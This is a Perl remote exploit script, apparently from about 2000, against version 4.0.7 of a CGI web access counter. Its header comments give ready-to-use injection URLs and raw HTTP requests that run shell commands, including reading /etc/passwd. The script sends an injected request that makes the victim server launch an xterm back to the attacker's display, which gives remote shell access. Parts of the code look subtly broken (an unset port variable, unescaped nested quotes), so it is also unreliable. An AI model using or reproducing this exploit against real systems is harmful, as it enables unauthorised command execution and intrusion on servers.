#!/usr/bin/perl
#
# access-counter.pl
# George Burgyan's Access Counter version 4.0.7 Remote Exploit
# Coded by slash <tcsh@b0f.i-p.com>
#
# Advisory by Howard Kash
#
# The popular CGI web page access counter version 4.0.7 by George
# Burgyan allows execution of arbitrary commands due to unchecked
# user input. Commands are executed with the same privilege as
# the web server. Of course, other exploits can be used to get
# root access on an unpatched OS.
#
# The counter consists of a perl script called "counter", and
# multiple links to counter called counter-ord, counterfiglet,
# counterfiglet-ord, counterbanner, and counterbanner-ord. The
# following examples illustrate how they can be exploited:
#
# Using straight URL
# ------------------
# http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
#
# Passing commands in a variable
# ------------------------------
# > telnet web-server www
# GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
# X: pwd;ls -la /etc;cat /etc/passwd
#
# > telnet web-server www
# GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
# X: echo;id;uname -a;w
#
# The counter was last updated in 1995 so is probably no longer
# supported. Links and email addresses referenced in the source
# code are no longer valid. However, it appears to still be widely
# used based on the number of references returned by search engine
# queries.
#
# Usage: [slash@linux]# ./access-counter.pl <Victim> <YourIP> <Display>
#
# You may try to change the path to the script, if this one isn't working
#
# Greetz go to Scrippie, Mixter, HWA, MDMA, mad 7350 releases !!! 
# and all the people who know me. Special greet goes to venglin !

use IO::Socket;

$host = $ARGV[0];
$attacker = $ARGV[1];
$display = $ARGV[2];
$cgi = "/cgi-bin/counterfiglet/nc";
$wait = 5;

print "Access Counter version 4.0.7 Remote Exploit\n";
print "Coded by slash <tcsh@b0f.i-p.com> \n";
print "Usage: $0  <Victim> <YourIP> <Display> \n";


if ($display !~ /\d/) {
    print("Display value has to be a number\n");
    exit(1);
}

print "Trying to connect to $host...";
$socket = IO::Socket::INET->
            new(Proto=>"tcp", 
            PeerAddr=>$host, 
            PeerPort=>$port) 
            || die "Connection failed.\n";

system("xhost + $host");

print "Trying to spawm xterm from $host to $attacker:$display...\n";
print $socket "GET $cgi/f=;sh%20-c%20"$HTTP_X" HTTP/1.0\n";
print $socket "X: xterm -ut -display $attacker:$display\n";

print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}
system("xhost - $host");
close($socket);
print "\nFinished spawning xterm.\n";

# EOF
#                   www.hack.co.za   [7 September 2000]#